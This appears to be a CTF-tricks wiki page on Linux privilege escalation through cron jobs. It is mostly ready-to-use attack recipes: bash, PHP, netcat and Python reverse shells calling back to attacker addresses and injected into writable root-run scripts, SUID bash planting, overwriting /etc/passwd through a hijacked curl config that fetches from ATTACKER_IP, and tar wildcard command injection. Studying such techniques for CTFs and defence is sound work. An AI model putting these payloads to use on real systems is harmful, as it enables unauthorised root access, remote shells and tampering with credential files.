> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/linux/capabilities/privilege-escalation-linux-cronjob.md).

# Cronjob

## Cron Job Script Injection Privilege Escalation

If a script executed by a root-owned cron job has world-writable permissions, you can inject a reverse shell payload into it.

First, identify cron jobs running on the system. You can check the root user's crontab and system-wide cron directories for scheduled tasks.

```bash
crontab -l
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.hourly/
ls -la /etc/cron.daily/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/
```

Examine the output for scripts or commands being executed by root. Once a potential script is identified, check its permissions to see if it's world-writable.

```bash
ls -l /path/to/potential/script.sh
```

Look for the 'w' permission in the third triplet (e.g., `-rwxrwxrwx`), indicating that 'other' users can write to the file.

If a world-writable script executed by root is found, you can inject a reverse shell payload into it, overwriting its original content.

```bash
echo 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1' > /path/to/vulnerable/script.sh
```

Set up a listener on your machine to catch the shell:

```bash
nc -lvnp YOUR_PORT
```

Ensure YOUR\_IP is your attacking machine's IP address and YOUR\_PORT is the port you are listening on. When the cron job executes the modified script, the reverse shell will connect back with root privileges.

***

## Cronjob Script Include Hijacking

Identify root cronjobs and analyze the scripts they execute (e.g., `/home/sysadmin/scripts/script.php`). Look for code that includes other files using functions like `include`, `require`, `include_once`, or `require_once`.

You can list user cronjobs with:

```bash
crontab -l
```

To list all users’ cron jobs, which typically requires root privileges, you can use the following command:

```bash
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l 2>/dev/null; done
```

System-wide cronjobs are typically found in directories like `/etc/cron.d/`, `/etc/cron.hourly/`, `/etc/cron.daily/`, `/etc/cron.weekly/`, `/etc/cron.monthly/`, and the main `/etc/crontab` file. Inspect the permissions and contents of these locations:

```bash
ls -la /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.hourly/
ls -la /etc/cron.daily/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/
```

Check permissions on the script executed by the cronjob or the included file. Use `ls -la` to view permissions:

```bash
ls -la /path/to/cron/script.sh
ls -la /path/to/writable/included_file.ext
```

If the cron job file or the script executed by a cron job is writable by your current user, you can modify it to execute your payload. Similarly, if a script executed by a cron job includes other files using commands like `include`, `require`, `include_once`, or `require_once`, and the included file is writable by your current user, you can modify it to execute your payload.

If writable by the current user (e.g., file permissions like `-rw-r-----`), replace the included file with your payload.

Example payload for PHP using a bash reverse shell:

```php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'");
?>
```

Another common PHP payload uses netcat:

```php
<?php exec("nc -e /bin/bash YOUR_IP YOUR_PORT"); ?>
```

Replace the target file with your chosen payload. For example, using the netcat payload:

```bash
echo '<?php exec("nc -e /bin/bash YOUR_IP YOUR_PORT"); ?>' > /path/to/writable/included_file.ext
```

Set up your listener:

```bash
nc -lvnp YOUR_PORT
```

The next time the root cronjob runs, it will execute your code from the included file, providing a root shell.

***

## PE via Writable Cronjob Script

If a script executed periodically by a cronjob under a different, higher-privileged user is writable by a lower-privileged user, you can inject malicious commands into it. When the cronjob runs, the injected code executes with the privileges of the cron user, allowing for privilege escalation.

First, identify potential cron jobs and check their permissions. System-wide cron jobs are often defined in `/etc/crontab` or files within the `/etc/cron.d/` directory. You can list the system-wide cron table using:

```bash
cat /etc/crontab
```

Examine the output for paths to scripts or commands being executed. Also, check the contents of the `/etc/cron.d/` directory:

```bash
ls -l /etc/cron.d/
```

Look for scripts or binaries executed by users other than the current low-privileged user. Once a potential script path is identified (e.g., `/usr/share/backup/backup.sh`), check its permissions to see if it's writable by the current user or their group:

```bash
ls -l /usr/share/backup/backup.sh
```

If the file is writable by our current user, we can add our malicious payload to it. In this example, `/usr/share/backup/backup.sh` was writable by the current user's group. Inject your desired command (e.g., a reverse shell) into the script using `echo`:

```bash
echo 'bash -i >& /dev/tcp/10.6.75.26/4444 0>&1' >> /usr/share/backup/backup.sh
```

Ensure your listener is set up (e.g., `nc -lvnp 4444`). Wait for the cron job to execute, and you should receive a shell with the privileges of the user running the cronjob.

***

## Privesc Via Writable Cron Script

Find a script writable by your low-privileged user that is executed by a higher-privileged user (like root) via a cron job. This often involves checking system-wide crontabs and user-specific crontabs. You can inspect files in locations such as `/etc/crontab`, `/etc/cron.d/`, and `/var/spool/cron/crontabs/`. Commands like `cat /etc/crontab`, `ls -la /etc/cron.d/`, and `ls -la /var/spool/cron/crontabs/` can help identify potential targets and their permissions.

Modify the script to inject malicious commands. A common technique is setting the SUID bit on bash. By setting the SUID bit on `/bin/bash`, when this executable is run, it will execute with the permissions of the file's owner, which is typically root.

Inject the following payload into the target script:

```bash
#!/bin/bash
# ... original script content ...
chmod +s /bin/bash
# ... rest of original script content ...
```

This payload, `chmod +s /bin/bash` (or `chmod u+s /bin/bash`), is used to add the SUID permission to the `/bin/bash` executable. The payload can be appended to the target script.

Wait for the cron job to execute the modified script. Once executed, the `/bin/bash` executable will have the SUID bit set, allowing you to leverage the SUID binary to gain a privileged shell.

To gain a privileged shell, execute `/bin/bash -p`. The `-p` flag is used to run bash in privileged mode, respecting the SUID bit and preventing it from dropping privileges.

***

## Root Via Curl Config Overwrite (Cronjob)

If a root cronjob is found executing `curl -K /path/to/writable/config_file` and you have write permissions on that file, you can achieve root.

The `/etc/passwd` file is a critical system file that contains essential information for each user account. Each line in `/etc/passwd` represents a user and typically follows the format: `username:password:UID:GID:comment:home_directory:shell`. The third field (UID) and fourth field (GID) determine the user's privileges. A UID and GID of `0` is traditionally reserved for the root user, granting superuser privileges.

First, obtain the target's `/etc/passwd` file and add a new user with UID and GID 0 (root privileges) to a copy on your attacker machine. A simple format for a passwordless root user is `username::0:0:User Name:/home/user:/bin/bash`. The empty field between the username and UID signifies a passwordless account.

```bash
# On target:
cat /etc/passwd > /tmp/passwd # Or transfer via other means
# Transfer /tmp/passwd to attacker machine
```

```bash
# On attacker machine:
echo 'root1::0:0:root1:/home/root1:/bin/bash' >> passwd
```

Host the modified `passwd` file on your attacker machine via HTTP:

```bash
# On attacker machine:
python3 -m http.server 80
```

This command starts a simple web server in the current directory, making the `passwd` file available for download.

On the target machine, overwrite the writable `curl` config file (e.g., `/home/F30s/site_check`) to instruct the root `curl` process to download your malicious `passwd` file and save it to `/etc/passwd`. The `-K` option in `curl` reads configuration from the specified file, allowing you to control its actions, including file downloads and output locations. The configuration file should contain `url` specifying the file to download and `output` specifying the destination path for the downloaded content.

```bash
# On target machine (if config file is /home/F30s/site_check):
echo "url = \"http://ATTACKER_IP/passwd\"" > /home/F30s/site_check
echo "output = \"/etc/passwd\"" >> /home/F30s/site_check
```

Wait for the root cronjob to execute. The system's `/etc/passwd` file will be overwritten with the malicious version containing your new root user. You can then log in as the new root user:

```bash
# On target machine:
su root1
```

***

## Tar Wildcard Injection Privilege Escalation

If a cron job uses `tar` with wildcards (`*` or similar) on a directory where you have write permissions, you can exploit tar's `--checkpoint` options for arbitrary command execution, often leading to privilege escalation if the cron job runs as a privileged user.

Gain a low-privileged shell and identify the vulnerable cron job and its target directory. Create two files in the target directory named after the specific tar options. These files tell `tar` to execute a command after processing each file (specifically, after 1 file).

```bash
touch --checkpoint=1
touch --checkpoint-action=exec=sh\ /path/to/your/rootshell.sh
```

Alternatively, the `--checkpoint-action` can be enclosed in quotes:

```bash
touch --checkpoint=1
touch '--checkpoint-action=exec=sh shell.sh'
```

Place your payload script (e.g., a reverse shell script like `rootshell.sh` or `shell.sh`) in the same directory or another accessible location. Ensure it is executable. A common payload script is:

```bash
#!/bin/bash
bash -i >& /dev/tcp/IP/PORT 0>&1
```

You can create this script using `echo` and make it executable:

```bash
echo 'bash -i >& /dev/tcp/your_attacker_ip/4444 0>&1' > shell.sh
chmod +x shell.sh
```

Set up your listener (e.g., `nc -lvnp 4444`) and wait for the cron job to execute. When `tar` processes the directory, it will encounter your specially named files, interpret them as options, and execute your payload script as the user running the cron job. For example, a simple command execution might look like this if `tar` processes a file like `/etc/hosts`:

```bash
tar --checkpoint=1 --checkpoint-action=exec=id a.tar /etc/hosts
```

This demonstrates how the options trigger execution. When the cron job runs, it will process the files you created in the target directory, triggering the `--checkpoint-action` and executing your script.

***

## Writable Cron Job Script Overwrite

If a script executed by a root cron job is writable by a low-privileged user, overwrite the script with a reverse shell or other payload. When the cron job runs again, it will execute the malicious script with root privileges.

To identify potential cron jobs, check common locations such as `/etc/crontab`, files within `/etc/cron.d/`, and user-specific crontabs located in `/var/spool/cron/crontabs/`. The `crontab -l` command can list the current user's cron jobs.

First, identify the root cron job and the script path it executes (e.g., `/var/www/laravel/artisan`). Confirm the script or its parent directory is writable by your current user. You can check file permissions using `ls -la <filepath>`.

Then, download your payload (e.g., a reverse shell) to the target and save it with the exact name and path of the script executed by cron. This can be done using tools like `wget` or `curl`:

```bash
www-data@cronos:/var/www/laravel$ wget http://10.10.16.16:8000/shell.php -O artisan
```

Alternatively, if direct download tools are unavailable, you can write the payload directly to the file using `echo`. For example, to execute a simple command:

```bash
echo 'whoami' > /path/to/writable/script.sh
```

Or a bash reverse shell:

```bash
echo 'bash -c "bash -i >& /dev/tcp/10.10.16.16/4444 0>&1"' > /path/to/writable/script.sh
```

Or a Python reverse shell:

```python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.16.16',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);
```

Wait for the cron job to execute. A reverse shell connection (if used as the payload) should be received on your listener with root privileges.
